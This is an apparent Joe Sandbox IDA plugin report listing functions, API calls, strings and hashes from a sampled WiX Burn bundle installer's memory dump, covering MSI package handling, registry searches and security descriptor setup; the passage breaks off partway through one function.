Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: 0500747f79be9756bb481f5d8883a519aeafb934a294cda4726f2534445a7f0b
Instruction ID: cdb32a77ebdeb91ff2ff30c3b1a51dc56611cf7eb29b32fe4060a36a674e6988
Opcode Fuzzy Hash: 0500747f79be9756bb481f5d8883a519aeafb934a294cda4726f2534445a7f0b
Instruction Fuzzy Hash: 86D0C233A0813957C32017E66C8CA5B7E98EF04AA17014024FD84D6620D771CC5082E1

Function 00100F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0012AAA0,00000000,?,001057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00100F80

Strings

regutil.cpp, xrefs: 00100FC3

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: e87a26f96908094d18ae90f5c916b54448dcc860c1729e3fd23c2c1e4d31e278
Instruction ID: 9c4bdb94a986167f6380d7abc8dc8ea3896d9c60efa26d5ef9bd198ab4d753d4
Opcode Fuzzy Hash: e87a26f96908094d18ae90f5c916b54448dcc860c1729e3fd23c2c1e4d31e278
Instruction Fuzzy Hash: 85F0F63360123777DB3606568C05FABAA49DB897B0F164135BDC69A2D0E7A18C10B6F0

Function 000C3AF0 Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,?,000C226D,?,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000), ref: 000C3B04
RtlReAllocateHeap.NTDLL(00000000,?,000C226D,?,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3B0B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: f9bb2c18afedc67a46b2d92d9f21ad3e58be441e09263ff88e24297145eddbaa
Instruction ID: 48e1a0f9115554cdcd4f9fcb45b1f8b866b4377b8b4011143bf6d65c49bbcf33
Opcode Fuzzy Hash: f9bb2c18afedc67a46b2d92d9f21ad3e58be441e09263ff88e24297145eddbaa
Instruction Fuzzy Hash: 2ED0C93215820DEBCF005FE8EC4DDAA3BACEB586027048405B955C2620C779E4A09A60

Function 001035C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001035F8

Part of subcall function 0010304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00103609,00000000,?,00000000), ref: 00103069
Part of subcall function 0010304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000EC025,?,000C5405,?,00000000,?), ref: 00103075

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: 517b368e1a1929d92444d40909d8eb3c8aa35f0759a5817a964759e3a6512f66
Instruction ID: 42d31396e3f4bea379e3cee0305b12e59f9b4ce151db95ab64856a3ac9515f65
Opcode Fuzzy Hash: 517b368e1a1929d92444d40909d8eb3c8aa35f0759a5817a964759e3a6512f66
Instruction Fuzzy Hash: 0D313076D01229AFCB11DFA9C884ADEB7F8EF08710F01456AED15BB351D7759E008BA4

Function 00105870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,0012AAA0,00000000,80070490,?,?,000D8B19,WiX\Burn,PackageCache,00000000,0012AAA0,00000000,00000000,80070490), ref: 001058CA

Part of subcall function 001010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0010112B
Part of subcall function 001010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00101163

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: 9a0c43eb111a0914e233bea4d8dfb1516213795c3d58d004a276e5e81c1973ac
Instruction ID: 9ae5c944ae858569bf0243f073a500b265b9f7b67b9488215151f3c45ca19b8e
Opcode Fuzzy Hash: 9a0c43eb111a0914e233bea4d8dfb1516213795c3d58d004a276e5e81c1973ac
Instruction Fuzzy Hash: 5711C636800629EFDB216E95CC819AFBB6AEF04320B15813AFEC167151C7B14E50DFD1

Function 000C34B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,000D8BD3,0000001C,80070490,00000000,00000000,80070490), ref: 000C34D5

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 9152dd58e125c004201cd9c38e9324b9658f086f12e3129ef5316422bd486e96
Instruction ID: 17cd0fd9e629ced767280f51a817dc13d86d97f8c032893c39961be5330a4840
Opcode Fuzzy Hash: 9152dd58e125c004201cd9c38e9324b9658f086f12e3129ef5316422bd486e96
Instruction Fuzzy Hash: 06E012722112247BE6022F615C05EEF7B5CAF053547008059FE40D6011D762E95087B0

Function 00102EFE Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,00000000,000C556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00102F0B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4a40089515f56c16b4a1f633a90b69bea0594c9873fbe34abccf301c208ddff3
Instruction ID: eb54c35022a120d1da1f4106e4c043fc1d1936611c1017a8ffc1e8167d1201c0
Opcode Fuzzy Hash: 4a40089515f56c16b4a1f633a90b69bea0594c9873fbe34abccf301c208ddff3
Instruction Fuzzy Hash: C4E0F6B192E625EECB208F6ABDC44427BB8F718B40304420BB804D2A20D7B054E38FE0

Non-executed Functions

Function 000CA8F1 Relevance: 170.4, APIs: 29, Strings: 68, Instructions: 688COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 000CB11C

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

CompareStringW.KERNEL32(0000007F,00000000,0010CA9C,000000FF,DirectorySearch,000000FF,0010CA9C,Condition,feclient.dll,0010CA9C,Variable,?,0010CA9C,0010CA9C,?,?), ref: 000CAA29
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 000CAA7E
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 000CAA9A
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 000CAABE
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 000CAB11
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 000CAB2B
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 000CAB53
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 000CAB91
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 000CABB0
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 000CABCF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 000CAC8D
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 000CACA7

Part of subcall function 001032F3: VariantInit.OLEAUT32(?), ref: 00103309
Part of subcall function 001032F3: SysAllocString.OLEAUT32(?), ref: 00103325
Part of subcall function 001032F3: VariantClear.OLEAUT32(?), ref: 001033AC
Part of subcall function 001032F3: SysFreeString.OLEAUT32(00000000), ref: 001033B7

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 000CAD06
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 000CAD28
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 000CAD48
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 000CAE20
SysFreeString.OLEAUT32(?), ref: 000CAFFE

Strings

Invalid value for @Root: %ls, xrefs: 000CB078
wininet.dll, xrefs: 000CAC03
Condition, xrefs: 000CA9F9
Failed to get @ExpandEnvironment., xrefs: 000CB050
Key, xrefs: 000CAC04
Failed to get @ProductCode., xrefs: 000CB0BE
ProductCode, xrefs: 000CAD84, 000CAE5C, 000CAF76
DirectorySearch, xrefs: 000CAA1A
Failed to get @ProductCode or @UpgradeCode., xrefs: 000CB094
Failed to select search nodes., xrefs: 000CA920
Failed to get Win64 attribute., xrefs: 000CB046
version.dll, xrefs: 000CAC1E
Failed to get @FeatureId., xrefs: 000CB0B7
state, xrefs: 000CADF7, 000CAF13, 000CAFC5
assignment, xrefs: 000CAF2D
HKU, xrefs: 000CABE1
comres.dll, xrefs: 000CADA6, 000CAE5B, 000CAE8B, 000CAF90
Failed to get @Path., xrefs: 000CB032
FileSearch, xrefs: 000CAAB1
Root, xrefs: 000CAB69
path, xrefs: 000CAA8D, 000CAB3A
Failed to get next node., xrefs: 000CB0EB
language, xrefs: 000CAEF7
exists, xrefs: 000CAA6F, 000CAB02, 000CAC7E
keyPath, xrefs: 000CADDB
Failed to get @Variable., xrefs: 000CB0DD
HKCR, xrefs: 000CAB82
HKLM, xrefs: 000CABC2
Failed to get Key attribute., xrefs: 000CB06E
string, xrefs: 000CAD1B
Value, xrefs: 000CAC1F
Failed to get Value attribute., xrefs: 000CB03C
clbcatq.dll, xrefs: 000CAA3A, 000CAACD, 000CAD83, 000CAF75
feclient.dll, xrefs: 000CA9F8
ExpandEnvironment, xrefs: 000CACBB
UpgradeCode, xrefs: 000CAE8C
RegistrySearch, xrefs: 000CAB46
Failed to get @Condition., xrefs: 000CB028
Invalid value for @VariableType: %ls, xrefs: 000CB05D
MsiComponentSearch, xrefs: 000CAD61
msi.dll, xrefs: 000CAC5C
HKCU, xrefs: 000CABA3
Failed to get search node count., xrefs: 000CA945
Win64, xrefs: 000CAC5D
Failed to get @UpgradeCode., xrefs: 000CB08D
Failed to get @VariableType., xrefs: 000CB064
Variable, xrefs: 000CA9DE
Failed to allocate memory for search structs., xrefs: 000CA97D
FeatureId, xrefs: 000CAF91
Failed to get @Root., xrefs: 000CB07F
numeric, xrefs: 000CACF7
value, xrefs: 000CAC9A
search.cpp, xrefs: 000CA973
version, xrefs: 000CAB1E, 000CAD3B, 000CAEDB
MsiProductSearch, xrefs: 000CAE39
Failed to get @Type., xrefs: 000CB0B0
Failed to get @ComponentId., xrefs: 000CB086
cabinet.dll, xrefs: 000CACBA
ComponentId, xrefs: 000CADA7
directory, xrefs: 000CAE13
Failed to get @Id., xrefs: 000CB0E4
Unexpected element name: %ls, xrefs: 000CB0CD
Type, xrefs: 000CAA56, 000CAAE9, 000CAC42, 000CADC2, 000CAEC2, 000CAFAC
MsiFeatureSearch, xrefs: 000CAF53
DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch, xrefs: 000CA90D
VariableType, xrefs: 000CACDE
Invalid value for @Type: %ls, xrefs: 000CB0A1
Path, xrefs: 000CAA3B, 000CAACE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
API String ID: 2748437055-1695159631
Opcode ID: 8b79dd161fab0522ef7d7fcccf35d0ff52cc1695902cd0752d15008e8fa8cba5
Instruction ID: 331c7a03788acb840c3d10a400e1c2f6afbf4c00698eb764cd4d08af869662ff
Opcode Fuzzy Hash: 8b79dd161fab0522ef7d7fcccf35d0ff52cc1695902cd0752d15008e8fa8cba5
Instruction Fuzzy Hash: 0422C731E4822ABADB309B958C43F6E7AA4AB15734F304728F570B61D1DBF19E40DAD1

Function 000E41EA Relevance: 43.0, Strings: 34, Instructions: 498COMMON

Download Yara Rule

Strings

Failed to uninstall MSI package., xrefs: 000E47EF
ACTION=ADMIN, xrefs: 000E4709
VersionString, xrefs: 000E428E, 000E42EF
msasn1.dll, xrefs: 000E440B
Failed to initialize external UI handler., xrefs: 000E43F4
Failed to build MSI path., xrefs: 000E439D
REINSTALL=ALL, xrefs: 000E45D3, 000E464D
%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 000E4687
Failed to add properties to argument string., xrefs: 000E4463
Failed to run maintanance mode for MSI package., xrefs: 000E46F6
Failed to get cached path for package: %ls, xrefs: 000E434F
Failed to add reboot suppression property on install., xrefs: 000E45BB
crypt32.dll, xrefs: 000E440A
Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 000E460C
Failed to enable logging for package: %ls to: %ls, xrefs: 000E441F
Failed to perform minor upgrade of MSI package., xrefs: 000E4638
%ls %ls=ALL, xrefs: 000E46B6, 000E4795
WixBundleExecutePackageCacheFolder, xrefs: 000E436A, 000E48A4
Failed to install MSI package., xrefs: 000E4746
REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 000E45F5
feclient.dll, xrefs: 000E42C5, 000E434D, 000E441D, 000E454B, 000E47D8
REBOOT=ReallySuppress, xrefs: 000E45A0, 000E476C
Failed to add reinstall all property on minor upgrade., xrefs: 000E45EA
Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 000E469B
Failed to add reboot suppression property on uninstall., xrefs: 000E477D
Failed to add obfuscated properties to argument string., xrefs: 000E4497
IGNOREDEPENDENCIES, xrefs: 000E46A5, 000E4784
Failed to add patch properties to argument string., xrefs: 000E44FD
Failed to add patch properties to obfuscated argument string., xrefs: 000E451F
Failed to add feature action properties to argument string., xrefs: 000E44B9
WixBundleExecutePackageAction, xrefs: 000E43B7, 000E48B4
Failed to add the list of dependencies to ignore to the properties., xrefs: 000E46CA
Failed to add feature action properties to obfuscated argument string., xrefs: 000E44DB
Failed to add ADMIN property on admin install., xrefs: 000E471E

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
API String ID: 0-2033600224
Opcode ID: 0d053ac54785db76d6eb0f89005613b09b5d00af9b5cea35a1e2d0a9b1948bb4
Instruction ID: fa05f298e979e9660c6e21b331eadf7c0f2c3139c2e36661538b81e19fc84a18
Opcode Fuzzy Hash: 0d053ac54785db76d6eb0f89005613b09b5d00af9b5cea35a1e2d0a9b1948bb4
Instruction Fuzzy Hash: ED029171A40665AFDB219F66CC85FEDB7AABB54710F0001A5F508B7252D772AEA0CFC0

Function 00101719 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 337COMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 001017B1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001017BB
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00101808
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0010180E
CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00101848
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0010184E
CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 0010188E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00101894
CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 001018D4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001018DA
CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 0010191A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00101920
SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 00101A11
SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 00101A4B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00101A55
SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 00101A8D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00101A97
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00101AD0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00101ADA
CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 00101B18
LocalFree.KERNEL32(?), ref: 00101B2E

Strings

srputil.cpp, xrefs: 001017DC

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
String ID: srputil.cpp
API String ID: 267631441-4105181634
Opcode ID: 1776eb3779104a864140f497987a61d4a0ae39ee08dec47bf68e524536138a49
Instruction ID: de8b0c709c4428a81f0f4ed069869443f05a486163f9b01a4d21b833bd886b77
Opcode Fuzzy Hash: 1776eb3779104a864140f497987a61d4a0ae39ee08dec47bf68e524536138a49
Instruction Fuzzy Hash: ECC16776D4123DABD7319F958C48BDFFAB8BF44750F0141AAA944F7280D7B49E408EA0

Function 000EC332 Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 376COMMON

Download Yara Rule

Strings

Failed to allocate space for burn payload inside of related bundle struct, xrefs: 000EC3BE
Failed to copy install arguments for related bundle package, xrefs: 000EC584
Failed to copy version for pseudo bundle., xrefs: 000EC72D
Failed to copy filename for pseudo bundle., xrefs: 000EC417
Failed to append relation type to uninstall arguments for related bundle package, xrefs: 000EC644
Failed to copy display name for pseudo bundle., xrefs: 000EC74F
pseudobundle.cpp, xrefs: 000EC379, 000EC3B2, 000EC4A1, 000EC6D2
Failed to copy local source path for pseudo bundle., xrefs: 000EC43B
Failed to append relation type to repair arguments for related bundle package, xrefs: 000EC5F1
-%ls, xrefs: 000EC34C
Failed to allocate memory for dependency providers., xrefs: 000EC6DE
Failed to append relation type to install arguments for related bundle package, xrefs: 000EC5A9
Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 000EC385
Failed to allocate memory for pseudo bundle payload hash., xrefs: 000EC4AD
Failed to copy cache id for pseudo bundle., xrefs: 000EC55F
Failed to copy uninstall arguments for related bundle package, xrefs: 000EC623
Failed to copy repair arguments for related bundle package, xrefs: 000EC5D0
Failed to copy key for pseudo bundle payload., xrefs: 000EC3F3
Failed to copy download source for pseudo bundle., xrefs: 000EC469
Failed to copy key for pseudo bundle., xrefs: 000EC542

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
API String ID: 1357844191-2832335422
Opcode ID: 87cbd09bc44bb466ccfc0cd30b6af9d6456ef067b0b825a0205f00dd206b5aac
Instruction ID: 8d8e508e7901039a7ab5d512e914f90c38b2364c1fe677dc464b85300fc868bf
Opcode Fuzzy Hash: 87cbd09bc44bb466ccfc0cd30b6af9d6456ef067b0b825a0205f00dd206b5aac
Instruction Fuzzy Hash: 6EC1E472604696AFEB29DF25C851FAA77A8FF08710B044129FD05FB241D772EC929BD0

Function 000C45EE Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 141sleepshutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 000C4617
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 000C461E
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 000C4628
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 000C4678
GetLastError.KERNEL32 ref: 000C4682
